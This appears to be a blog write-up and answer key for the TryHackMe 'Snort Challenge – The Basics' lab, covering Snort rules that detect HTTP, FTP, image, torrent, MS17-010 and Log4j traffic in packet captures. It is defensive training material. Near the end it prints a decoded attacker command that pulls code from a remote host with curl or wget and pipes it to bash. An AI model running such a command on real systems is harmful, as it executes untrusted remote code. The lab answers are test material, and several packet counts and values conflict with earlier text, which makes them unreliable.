We covered using Snort to analyze FTP and HTTP traffic by creating and configuring the appropriate rules. To apply what we learned, we analyzed given network captures using Snort to test the created rules and detect traffic patterns. This was part of TryHackMe Snort Challenge – The Basics.

Snort Study Notes

Splunk SIEM Full Course with Practical Scenarios

Introduction to Snort

SNORT is an open-source, rule-based Network Intrusion Detection and Prevention System (NIDS/NIPS). It was developed and still maintained by Martin Roesch, open-source contributors, and the Cisco Talos team. 
Capabilities of Snort

  • Live traffic analysis
  • Attack and probe detection
  • Packet logging
  • Protocol analysis
  • Real-time alerting
  • Modules & plugins
  • Pre-processors
  • Cross-platform support! (Linux & Windows)

Snort IDS Operating Modes

  • Sniffer Mode – Read IP packets and prompt them in the console application.
  • Packet Logger Mode – Log all IP packets (inbound and outbound) that visit the network.
  • NIDS and NIPS Modes: Log/drop the packets that are deemed as malicious according to the user-defined rules

Snort Rules

Snort is an open-source Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). The challenge involves creating Snort rules to detect HTTP and FTP traffic by analyzing provided PCAP files.Two methods are demonstrated: writing Snort rules to detect packets and running Snort in packet logger mode to capture and analyze packets without generating alerts.

HTTP Traffic Detection

The task requires creating rules to detect all TCP Port 80 (HTTP) traffic. Two rules are written: one for outbound traffic (from your network to external servers) and one for inbound traffic (from servers to your network).After writing the rules, Snort is run to analyze the PCAP file, and the number of detected packets (alerts) is extracted. The final result shows 164 detected packets.

The video explains how to open the generated alert file to review the detected packets, including details like source IP, destination IP, and port numbers.

Analyzing Specific Packets

The task also requires extracting information from specific packets (e.g., packet 65). Using Snort’s output, the video demonstrates how to analyze the captured traffic and identify key information like source IP addresses and destination IP addresses for specific packet numbers.

FTP Traffic Detection

The next task focuses on detecting FTP traffic on Port 21. Similar to the HTTP task, rules are created to detect FTP traffic in both outbound and inbound directions.After running Snort with these rules, the system detects 307 FTP packets, and further analysis is performed on the captured data.

The video explains how to review the alerts and extract the FTP service name from the captured packets by analyzing the log files.

Reviewing Logs and Alerts

The video also covers how to analyze log files generated by Snort, filtering for specific protocols (like FTP) and viewing the full packet dump to identify key information, including the FTP service name.

Room Answers | Snort Challenge – The Basics

What is the number of detected packets?

Note: You must answer this question correctly before answering the rest of the questions in this task.

328

Investigate the log file.

What is the destination address of packet 63?

145.254.160.237

Investigate the log file.

 What is the ACK number of packet 64?

0x38AFFFF3

Investigate the log file.

What is the SEQ number of packet 62?

0x38AFFFF3

W

Investigate the log file.

What is the TTL of packet 65?

128

Investigate the log file.

What is the source IP of packet 65?

145.254.160.237

Investigate the log file.

What is the source port of packet 65?

3372

Use the given pcap file.

Write rules to detect “all TCP port 21”  traffic in the given pcap.

What is the number of detected packets?

614

Investigate the log file.

What is the FTP service name?

Microsoft FTP service

Clear the previous log and alarm files.

Deactivate/comment on the old rules.

Write a rule to detect failed FTP login attempts in the given pcap.

What is the number of detected packets?

41

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect successful FTP logins in the given pcap.

What is the number of detected packets?

1

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.

What is the number of detected packets?

42

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect failed FTP login attempts with “Administrator” username but a bad password or no password.

What is the number of detected packets?

7

Navigate to the task folder.

Use the given pcap file.

Write a rule to detect the PNG file in the given pcap.

Investigate the logs and identify the software name embedded in the packet.

Adobe Imagereadyq

Clear the previous log and alarm files.

Deactivate/comment on the old rule.

Write a rule to detect the GIF file in the given pcap.

Investigate the logs and identify the image format embedded in the packet.

GIF89a

Navigate to the task folder.

Use the given pcap file.

Write a rule to detect the torrent metafile in the given pcap.

 What is the number of detected packets?

2

Investigate the log/alarm files.

What is the name of the torrent application?

bittorrent

Investigate the log/alarm files.

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

application/x-bittorrent

Investigate the log/alarm files.

What is the hostname of the torrent metafile?

tracker2.torrentbox.com

In this section, you need to fix the syntax errors in the given rule files. 

You can test each ruleset with the following command structure;

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

16

Fix the syntax error in local-2.rules file and make it work smoothly.

What is the number of the detected packets?

68

Fix the syntax error in local-3.rules file and make it work smoothly.

What is the number of the detected packets?

87

Fix the syntax error in local-4.rules file and make it work smoothly.

What is the number of the detected packets?

90

Fix the syntax error in local-5.rules file and make it work smoothly.

What is the number of the detected packets?

155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

What is the number of the detected packets?

2

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

What is the name of the required option:

msg

Navigate to the task folder.

Use the given pcap file.

Use the given rule file (local.rules) to investigate the ms1710 exploitation.

What is the number of detected packets?

25154

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect payloads containing the “\IPC$” keyword.

What is the number of detected packets?

12

Investigate the log/alarm files.

What is the requested path?

\192.168.116.138\IPC$

What is the CVSS v2 score of the MS17-010 vulnerability?

9.3

Use the given pcap file.

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

26

Investigate the log/alarm files.

How many rules were triggered?.

4

Investigate the log/alarm files.

What are the first six digits of the triggered rule sids?

210037

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.

What is the number of detected packets?

41

Investigate the log/alarm files.

What is the name of the used encoding algorithm?

base64

Investigate the log/alarm files.

What is the IP ID of the corresponding packet?

62808

Investigate the log/alarm files.

Decode the encoded command.

What is the attacker’s command?

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

9.3

Video Walkthrough | TryHackMe Snort Challenge – The Basics

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles